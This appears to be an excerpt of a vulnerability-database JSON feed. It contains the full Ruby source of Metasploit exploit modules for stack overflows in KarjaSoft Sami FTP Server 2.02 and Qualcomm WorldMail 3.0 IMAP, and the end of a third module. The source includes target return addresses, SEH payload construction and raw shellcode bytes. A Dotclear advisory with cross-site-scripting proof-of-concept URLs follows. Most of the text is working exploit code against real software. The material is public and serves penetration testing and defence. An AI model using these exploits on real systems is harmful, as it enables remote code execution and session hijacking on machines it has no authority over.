file_create(hhp)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb"}, {"lastseen": "2019-12-07T16:29:59", "bulletinFamily": "exploit", "description": "This module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting payloads. When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system.\n", "modified": "2017-11-08T16:00:24", "published": "2008-03-17T14:23:01", "id": "MSF:EXPLOIT/WINDOWS/FTP/SAMI_FTPD_USER", "href": "", "type": "metasploit", "title": "KarjaSoft Sami FTP Server v2.02 USER Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'KarjaSoft Sami FTP Server v2.02 USER Overflow',\n 'Description'\t=> %q{\n This module exploits the KarjaSoft Sami FTP Server version 2.02\n by sending an excessively long USER string. The stack is overwritten\n when the administrator attempts to view the FTP logs. Therefore, this exploit\n is passive and requires end-user interaction. Keep this in mind when selecting\n payloads. When the server is restarted, it will re-execute the exploit until\n the logfile is manually deleted via the file system.\n },\n 'Author'\t=> [ 'aushack' ],\n 'Arch'\t\t=> [ ARCH_X86 ],\n 'License'\t=> MSF_LICENSE,\n 'Stance'\t=> Msf::Exploit::Stance::Passive,\n 'References'\t=>\n [\n # This exploit appears to have been reported multiple times.\n [ 'CVE', '2006-0441'],\n [ 'CVE', '2006-2212'],\n [ 'OSVDB', '25670'],\n [ 'BID', '16370'],\n [ 'BID', '22045'],\n [ 'BID', '17835'],\n [ 'EDB', '1448'],\n [ 'EDB', '1452'],\n [ 'EDB', '1462'],\n [ 'EDB', '3127'],\n [ 'EDB', '3140']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Platform' \t=> ['win'],\n 'Privileged'\t=> false,\n 'Payload'\t=>\n {\n 'Space'\t\t\t=> 300,\n 'BadChars'\t\t=> \"\\x00\\x0a\\x0d\\x20\\xff\",\n 'StackAdjustment'\t=> -3500,\n },\n 'Targets' \t=>\n [\n [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll\n [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll\n [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll\n [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll\n ],\n 'DisclosureDate' => 'Jan 24 2006'))\n\n register_options(\n [\n Opt::RPORT(21),\n ])\n end\n\n def check\n connect\n banner = sock.get_once(-1, 3)\n disconnect\n\n if (banner =~ /Sami FTP Server 2\\.0\\.2/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)\n\n login = \"USER #{sploit}\\r\\n\"\n login << \"PASS \" + Rex::Text.rand_char(payload_badchars)\n\n sock.put(login + \"\\r\\n\")\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/sami_ftpd_user.rb"}, {"lastseen": "2019-11-30T03:57:08", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this particular vulnerability. NOTE: The service does NOT restart automatically by default. You may be limited to only one attempt, so choose wisely!\n", "modified": "2017-07-24T13:26:21", "published": "2006-10-25T22:03:40", "id": "MSF:EXPLOIT/WINDOWS/IMAP/EUDORA_LIST", "href": "", "type": "metasploit", "title": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Imap\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n particular vulnerability.\n\n NOTE: The service does NOT restart automatically by default. You may be limited to\n only one attempt, so choose wisely!\n },\n 'Author' => [ 'MC', 'jduck' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-4267'],\n [ 'OSVDB', '22097'],\n [ 'BID', '15980'],\n\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 750,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x7b\",\n 'StackAdustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'WorldMail 3 Version 6.1.19.0', { 'Ret' => 0x600b6317 } ], # p/p/r in MLstMgr.dll v6.1.19.0\n [ 'WorldMail 3 Version 6.1.20.0', { 'Ret' => 0x10022187 } ], # p/p/r in msremote.dll ?\n [ 'WorldMail 3 Version 6.1.22.0', { 'Ret' => 0x10022187 } ], # p/p/r in MsRemote.dll v6.1.22.0\n ],\n 'DisclosureDate' => 'Dec 20 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n targ = auto_target\n disconnect\n\n return Exploit::CheckCode::Appears if (targ)\n return Exploit::CheckCode::Safe\n end\n\n def auto_target\n connect\n\n if (banner and banner =~ /WorldMail/ and banner =~ /IMAP4 Server (.*) ready/)\n version = $1\n ver = version.split('.')\n if (ver.length == 4)\n major = ver[0].to_i\n minor = ver[1].to_i\n rev = ver[2].to_i\n build = ver[3].to_i\n if (major == 6 and minor == 1)\n return targets[1] if (rev == 19)\n return targets[2] if (rev == 20)\n return targets[3] if (rev == 22)\n end\n end\n end\n\n # no target found\n nil\n end\n\n def exploit\n if (target_index == 0)\n mytarget = auto_target\n if mytarget\n print_status(\"Automatically detected \\\"#{mytarget.name}\\\" ...\")\n else\n fail_with(Failure::NoTarget, 'Unable to automatically detect a target')\n end\n else\n mytarget = target\n connect\n end\n\n jmp = \"\\x6a\\x05\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x2f\\x77\\x28\"\n jmp << \"\\x4b\\x83\\xeb\\xfc\\xe2\\xf4\\xf6\\x99\\xf1\\x3f\\x0b\\x83\\x71\\xcb\\xee\\x7d\"\n jmp << \"\\xb8\\xb5\\xe2\\x89\\xe5\\xb5\\xe2\\x88\\xc9\\x4b\"\n\n sploit = \"a001 LIST \" + rand_text_alphanumeric(20)\n sploit << payload.encoded\n sploit << generate_seh_record(mytarget.ret)\n sploit << make_nops(8) + jmp + rand_text_alphanumeric(40)\n sploit << \"}\" + \"\\r\\n\"\n\n sock.put(sploit)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/imap/eudora_list.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "Dotclear 1.* Cross Site Scripting Vulnerability\r\n\r\n\r\n1--two cross site scripting vulnerabilities have been discovered in the\r\ndotclear1.* allowing a remote attackers to hijack authenticated session\r\nWorkaround:\r\n$post_id (trackback.php)\r\n$tool_url(/tools/thememng/index.php)\r\nare not filtered\r\n2-Proof of Concepts:\r\ndotclear/ecrire/trackback.php?post_id="><script>alert(document.cookie\r\n);</script>\r\n\r\n/ecrire/tools.php?tool_url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&p=thememng\r\n\r\n\r\n3-Disclosure timeline\r\n05/04/2007 dotclear team contacted\r\n10/04/2007 fixed\r\n\r\n4-solution:\r\nupgrade to dotclear 1.2.6\r\nhttp://www.dotclear.net/\r\n\r\nfound by nassim\r\nhttp://www.securlabs.com/", "modified": "2007-04-13T00:00:00", "published": "2007-04-13T00:00:00", "id": "SECURITYVULNS:DOC:16702", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16702", "title": "[Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
